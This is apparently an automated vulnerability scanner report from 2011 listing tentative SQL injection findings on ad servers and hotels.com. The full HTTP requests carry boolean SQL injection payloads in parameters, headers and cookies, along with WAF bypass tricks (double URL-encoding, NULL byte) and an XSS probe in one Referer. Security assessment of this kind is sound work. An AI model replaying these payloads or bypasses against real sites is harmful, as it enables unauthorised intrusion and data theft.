The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH'%20and%201%3d1--%20;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 427

e9 = new Object();
e9.size = "300x250";
document.write("\n");
document.write("<scr"+"ipt type=\"text/javascript\" src=\"http://tags.expo9.exponential.com/tags/Premierleaguecom/ROS/tags.js\">\n");
document.write("</scr"+"ipt>\n");

var adcount_2816969_1_=new Image();
adcount_2816969_1_.src="http://adserver.adtech.de/adcount|2.0|327|2816969|0|170|AdId=6638640;BnId=2;ct=2204870089;st=783;adcid=1;itime=599386577;reqtype=5;";

Request 2

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH'%20and%201%3d2--%20;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN");
       span.innerHTML = __ADTECH_CODE__;
       window.frameElement.parentNode.appendChild(span);
       __bCodeFlushed = true;
   }
}

if (typeof inFIF != "undefined") {
   document.write = function(str) {
       __ADTECH_CODE__ += str;
   };
   
   document.writeln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816969(i) {
var sVersion_2816969 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"swVersion_ = swControl_.GetVariable(\"$version\")\r\n"+
"end if";
window.execScript(sVersion_2816969, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://www.barclays.co.uk/footballoffset";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=300 height=250";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz170Sq101119310V0Id116/OffsetMortgage_route1_300x250_v7.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick
...[SNIP]...

1.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1'
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816969(i) {
var sVersion_2816969 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599348458 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1''
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1712

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...

1.10. http://adserver.adtech.de/addyn|3.0|999|3106006|0|168|ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|999|3106006|0|168|ADTECH

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=127;misc=1317599832812&1%2527=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19466

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_3106006(i) {
var sVersion_3106006 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn|3.0|999|3106006|0|168|ADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=127;misc=1317599832812&1%2527%2527=1 HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 2131

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...

1.11. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176 [NGUserID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Issue detail

The NGUserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NGUserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484%00'; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response 1

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:33 GMT
Server: Apache
X-Server: prdlmn4008
AdServer: 10.28.75.26:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:33 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 5531
Content-Type: text/html

<META HTTP-EQUIV="Content-type" CONTENT="text/html;charset=ISO-8859-1">
<!-- Sniffer Code for Flash version=100 -->
<SCRIPT LANGUAGE=JavaScript>
<!--
var swf_click = "http://dm.travelocity.com/event.n
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484%00''; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response 2

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:34 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:34 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 794
Content-Type: text/html

<a target="_new" href="/event.ng/Type=click&FlightID=57279&AdID=88855&TargetID=8870&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,22308,22422,22783,22972,22974,23055
...[SNIP]...

1.12. http://www.hotels.com/compare/hotel_dockingbar.html [SSPV cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The SSPV cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the SSPV cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA'%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
Cteonnt-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=185.0.0.i1%3A114.0.0%3A130.0.1.i2%3A103.4.1.i6%3A171.0.0%3A48.1.0%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A108.1.0.i2%3A190.2.0%3A134.0.1%3A2.2.1%3A209.0.1%3A147.0.1.i6%3A92.6.0.i1%3A132.2.0.i2%3A122.1.0.i3%3A149.1.0.i1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:29 GMT; Path=/
Set-Cookie: user=RCoxODUuMC4wLmkxOjExNC4wLjA6MTMwLjAuMS5pMjoxMDMuNC4xLmk2OjE3MS4wLjA6NDguMS4wOjk4LjYuNDoxNDIuMC4wLmk0OjE5OC4yLjA6MTQ1LjAuMC5pMjoyMDAuMC4wOjEwOC4xLjAuaTI6MTkwLjIuMDoxMzQuMC4xOjIuMi4xOjIwOS4wLjE6MTQ3LjAuMS5pNjo5Mi42LjAuaTE6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjE0OS4xLjAuaTF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:29 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href
...[SNIP]...

Request 2

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA'%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 4065
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 4065
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:29:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VT; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:29:30 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Recently viewed hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Recently viewed hotels <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareRecentlyViewedLink\" class=\"hidden\" title=\"Compare recently viewed hotels\">\n Compare recently viewed hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <fieldset class=\"shortlisted_hotels\">\n <legend class=\"tab_title\">\n <a href=\"\" title=\"Saved hotels\">\n <span class=\"icon_sprite_commons js_visible\"><span class=\"right_arrow\"><!-- IE6 --><\/span><\/span>\n Your shortlist <span class=\"h_count\">(0)<\/span><\/a>\n <a href=\"#\" id=\"dockingBarCompareShortlistedLink\" class=\"hidden\" title=\"Compare shortlisted hotels\">\n Compare shortlisted hotels<span class=\"icon_sprite_commons\">\n <span class=\"right_arrow_button_large\"><!-- IE6 --><\/span>\n <\/span>\n <\/a>\n <\/legend>\n <div class=\"listpad\"><ul><\/ul><\/div>\n <\/fieldset>\n <span id=\"move_left\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n <span id=\"move_right\"><span class=\"arr1\"><\/span><span class=\"arr2\"><\/span><\/span>\n
...[SNIP]...

1.13. http://www.hotels.com/compare/hotel_dockingbar.html [SSRT cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The SSRT cookie appears to be vulnerable to SQL injection attacks. The payloads 17075075'%20or%201%3d1--%20 and 17075075'%20or%201%3d2--%20 were each submitted in the SSRT cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-67197593 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
